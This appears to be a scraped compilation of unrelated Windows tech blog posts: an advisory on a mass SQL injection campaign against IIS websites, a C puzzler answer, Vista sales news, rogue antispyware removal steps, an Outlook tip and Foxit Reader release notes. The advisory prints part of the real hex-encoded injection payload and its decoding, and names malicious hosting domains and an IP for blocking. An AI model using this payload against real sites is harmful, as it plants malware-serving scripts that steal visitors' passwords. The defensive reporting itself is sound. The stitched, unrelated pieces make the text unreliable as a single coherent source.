Earlier this week I published a post regarding a vulnerability in several versions of Microsoft Windows…
…Well the vulnerability is now being executed-there is another round of Mass SQL injections going on which has infected hundreds of thousands of websites running on the IIS platform.

Preforming a simple Google search for traces of the malicious script results in over 510,000 modified pages.

With more and more websites using a SQL back-end to make them faster and more dynamic, it also means that it’s crucial to verify what information get stored in or requested from those databases - especially if you allow users to upload content themselves which happens all the time in discussion forums, blogs, feedback forms etc. Unless that data is sanitized before it gets saved you can’t control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls.

Currently the malicious file that is being injected is 1.js however it must be noted that this could change at any stage. Visitors to this website are “treated” to 8 different exploits for many windows based applications including AIM, RealPlayer, and iTunes. DO NOTvisit sites that link to this site as you are very likely to get infected. Trendmicro named the malware toj_agent.KAQ it watches for passwords and passes them back to contoller’s ip.

In this case the injection code starts off like this (note, this is not the complete code):

   DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300
   4C00410052004500200040005400200076006100720063006800610072
   00280032003500350029002C0040004300200076006100720063006800
   610072002800320035003500290020004400450043004C004100520045
   0020005400610062006C0065005F0043007500720073006F0072002000
   43005500520053004F005200200046004F0052002000730065006C0065
   0063007400200061002E006E0061006D0065002C0062002E006E006100
   6D0065002000660072006F006D0020007300790073006F0062006A0065
   00630074007300200061002C0073007900730063006F006C0075006D00
   6E00730020006200200077006800650072006500200061002E00690064
   003D0062002E0069006400200061006E006400200061002E0078007400
   7900700065003D00270075002700200061006E0064002000280062002E
   00780074007900700065003D003900390020006F007200200062002E00
   780074007900700065003D003300350020006…

Which when decoded becomes:

   DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor
   CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b
   where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35
   or b…

What happens as a result? It finds all text fields in the database and adds a link to malicious javascript to each and every one of them which will make your website display them automatically. So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring (a dynamic value such as an article ID, product ID, et cetera) parameter and tried to use that to upload their SQL injection code.

So far three different domains have been used to host the malicious content — nmidahena.com, aspder.com and nihaorr1.com. There’s a set of files that gets loaded from these sites that attempts to use different exploits to install an online gaming trojan. Right now the initial exploit page on all domains are inaccessible but that could change. So if you’re a firewall administrator we recommend you to block access to them.

I would recommend that Administrators block access to hxxp:/www.nihaorr1.com and the IP it resolves to 219DOT153DOT46DOT28 at the edge or border of your network.

Info sourced from f-secure

Note: this content originally from http://mygreenpaste.blogspot.com. If you are reading it from some other site, please take the time to visit My Green Paste, Inc. Thank you.

Previously, I had written about the puzzlers on the NTDebugging / Microsoft Advanced Windows Debugging and Troubleshooting blog - specifically, the most recent puzzler which involved reverse engineering some assembler. The answer was posted today - there were a lot of responses, and a lot of correct responses.

I had posted the hashes for my answer (which was correct), that I am now able to disclose...

void myfun( char* param1 )
{
    size_t local1 = strlen( param1 );
    for( int local2 = local1; local2 > 0; local2-- )
    {
        for( int local3 = 0; local3 < local2 - 1; local3++ )
        {
            if( *(param1+local3) > *(param1+local3+1) )
            {
                char local4 = *(param1+local3);
                *(param1+local3) = *(param1+local3+1);
                *(param1+local3+1) = local4;
            }
        }
    }
}

Microsoft Corp. said Thursday that it has sold 140 million licenses of Windows Vista.
Colleen Healy, general manager of investor relations, made the statement during a conference call with Wall Street analysts after Microsoft posted its third-quarter earnings. The company pointed to strong PC sales for helping the much-maligned operating system achieve that number.
However, revenue from Microsoft's client division, which overwhelmingly comes from sales of Windows Vista or XP licenses, was down 24% from last year's third quarter to $4.03 billion. Chris Liddell, Microsoft's chief financial officer, attributed the decrease to strong sales a year ago immediately after Vista's launch, plus increased software piracy in developing countries and other reasons.
View Full Article: Computerworld

Awola Antispyware 6.0 Descriptions:

Awola Antispyware 6.0, or simpley Awola, is the latest counterfeit anti-spyware software that endangers the world of computers. Awola Antispyware usually installed itself onto your PC without your permission, through Vundo Trojan, Virus or fake software. Awola Antispyware will display fake system alerts or fake security alerts to trick user to buy the paid version of Awola Antispyware, in order to remove the potential and reported problems. Not only does it cause your machine to slow down dramatically, it would also put your privacy and data in risk.

Download SpyHunter* Spyware Detection Utility.

Manual Removal Instructions:

Stop Awola Antispyware Processes:
(Learn how to do this)
Awola.exe

Find and Delete these Awola Antispyware Files:
(Learn how to do this)
Awola.exe
Awola001.bas
Awola Anti-Spyware 6.0.lnk

Remove Awola Antispyware Registry Values:
(Learn how to do this)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Awola Antispyware
HKEY_LOCAL_MACHINE\SOFTWARE\Awola Antispyware.com

Download SpyHunter* Spyware Detection Utility.

You can also download the free version of Avira Antivir to remove the spyware (update)

Free up room on your Task Bar by minimizing your Outlook to the System Tray.

1. Right-click on the Outlook icon in the Notification Area, next to the clock.
2. In the resulting menu, select Hide When Minimized

Outlook 2007: Minimize to System Tray - Tech-Recipes.com

Foxit Reader 2.3 for Windows

What’s new in Version 2.3?

The following is a list of exciting improvements introduced in Foxit Reader 2.3.

New features:

• Bookmark Design: Makes it possible to have your own bookmarks. Users can create, edit, or delete bookmarks in a PDF file if the security settings allow.
• Multi-tab Browsing: Enables users to open multiple files in a single instance.You can choose to view PDFs in a multi-tab window or multiple instances by setting documents layout from the Preferences dialog.
• Multimedia Player Support: Supports many media formats including audio and video. Read multimedia ebooks with Foxit Reader 2.3.
• Callout and Text box Tool: Creates comments in a callout text box or a box. You can also define their appearance as other commenting tools.
• Commenting Text Tool: Enables users to add most types of text edits by right-clicking on the selected text, including highlight, strikeout, underline, squiggly and replacement. You can also use the Commenting Text Tool to add bookmarks for PDF files.
• Rulers and Guides: Provides horizontal and vertical ruler guides to help users align and position objects on the page. Right-clicking on the ruler enables you to change the unit of measurement.
• Magnifier: Magnifies areas of the PDF files easily as you work on Foxit Reader.
• Automatic Scrolling: Allows users to view documents without using mouse actions or keystrokes.
• OCG Support: Enables the user to view related content stored in a variable number of separate layers.
• FDF Related: Opens FDF files directly with Foxit Reader without any import implementations.

Enhanced features:

• Optimized Rendering:Supports progressive rendering and significantly reduces the response time from the user interface events.
• Improved Link Tools:Allows users to add actions to links, such as go to a page view, open or execute a file, open a web link, etc.
• Improved Snapshot:Enables users to print the selected area in Foxit Reader by simply selecting the Print option from the context menu.
• Search Enhancement:Allows users to float, move and resize the Full Foxit Search box.
• Better Annotation control:Groups drawing markups to help users operate objects collectively, and allows users to move annotations through pages.
• Font Information:Lists the fonts and the font types used in the original document in the Properties dialog.
• Updated Command Line:Allows users to open password protected PDF documents with a simple command prompt.
• Streamlined UI:A completely redesigned UI with a new look and feel makes Foxit Reader more intuitive than ever before.
• Many bug fixes.

Foxit Software